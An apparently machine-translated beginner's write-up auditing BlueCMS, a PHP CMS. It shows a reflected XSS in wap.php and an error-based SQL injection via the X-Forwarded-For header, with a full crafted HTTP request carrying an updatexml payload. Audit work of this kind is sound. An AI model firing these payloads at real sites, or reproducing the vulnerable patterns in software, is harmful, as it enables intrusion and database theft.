Getting started with bluecms code auditing

bluecms It's a very simple one cms Suitable for beginners php Code audit , Use it directly here seay Perform automated audits in one validation

The front desk xss, Appear in the wap.php, adopt request Method acceptance t Parameter and output directly

<?php
$t=$_REQUEST['t'];
//echo $t;
//exit;
?>
<script type="text/javascript">
// If you just jump to the home page + Enable dynamic browsing to wap.php Set as the first default document   If you enable static browsing, you can put index.html Set as the first default document   stay index.html Add the judgment code to jump to the mobile station 
var mobileAgent = new Array("iphone", "ipod", "ipad", "android", "mobile", "blackberry", "webos", "incognito", "webmate", "bada", "nokia", "lg", "ucweb", "skyfire");
var browser = navigator.userAgent.toLowerCase();
var isMobile = false; 
for (var i=0; i<mobileAgent.length; i++)
{
     
if (browser.indexOf(mobileAgent[i])!=-1)
{
     
isMobile = true; 
//alert(mobileAgent[i]); 
location.href = 'm.php?t=<?php echo $_REQUEST['t'] ?>';
break; 
}
else
{
    
location.href = 'index.php?t=<?php echo $_REQUEST['t'] ?>';// Do not add the judgment code to jump to the mobile station in the home page template 
}
} 
</script>

Direct access wap.php?t= Can directly trigger

The message board reports an error and injects it here because it is not right ip The head is filtered and spliced into sql In the sentence

	function add(){
    
		if($GLOBALS['G_DY']['vercode']==1){
    
		if(!$this->syArgs("vercode",1)||md5(strtolower($this->syArgs("vercode",1)))!=$_SESSION['doyo_verify'])message(" Verification code error ");
		}
		if(!$this->syArgs('tid'))message(" Please select a column ");
		$tid=$this->syArgs('tid');
		$this->type=syDB('classtype')->find(array('tid'=>$tid),null,'molds,classname,msubmit');
		if($this->type['msubmit']!=1){
    
			$this->member->p_r($this->type['msubmit']);
		}
		$isshow = ($this->my['group']['audit']==1) ? 1 : 0;
		$user = ($this->my['id']!=0) ? $this->my['user'] : ' tourists ';
		$fmolds = ($this->syArgs('fmolds',1)!='') ? $this->syArgs('fmolds',1) : '';
		$title = ($this->syArgs('title',1)!='') ? $this->syArgs('title',1) : $this->type['classname'];
		$body = ($this->syArgs('body',1)!='') ? $this->syArgs('body',1) : '';
		$row1 = array('tid' => $tid,'fmolds' => $fmolds,'faid' => $this->syArgs('faid'),'title' => $title,'addtime' => time(),'orders' => 0,'isshow' => $isshow,'user' => $user,'body' => $body,'reply'=>'');
		$row2=$this->fields_args('message',$tid);
		$add = syClass('c_message');
		$newv=$add->syVerifier($row1);
		echo $newv;
		if(false == $newv)
		{
    
			$a=$add->create($row1);$row2=array_merge($row2,array('aid' => $a));
			syDB('message_field')->create($row2);
			if($this->my['id']!=0){
    
				syDB('member_file')->update(array('hand'=>$this->syArgs('hand'),'uid'=>$this->my['id']),array('hand'=>0,'aid'=>$a,'molds' => 'message'));
			}else{
    
				syDB('member_file')->update(array('hand'=>$this->syArgs('hand'),'ip'=>GetIP()),array('hand'=>0,'aid'=>$a,'molds' => 'message'));

			}
			//message(' Successful release ',$GLOBALS["WWW"]);//bluecms  Back to the home page 
			message(' Successful release ');// Go back to the current page 
		}
		else
		{
    
			message_err($newv);
		}

Direct construction number packet

POST /index.php?c=message&a=add&tid=23 HTTP/1.1
Host: www.blue.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Forwarded-For: 8.8.8.8' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))####
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://www.blue.com:8080
Connection: close
Referer: http://www.blue.com:8080/?c=message&a=type&tid=23
Cookie: PHPSESSID=1gobivh9getno63fuj0d67knn5
Upgrade-Insecure-Requests: 1

title=111&u_nianlin=111&download=111&hand=0006197981&body=1111

That's it. The password here has been used twice md5 encryption , In fact, there are still many loopholes that have not been audited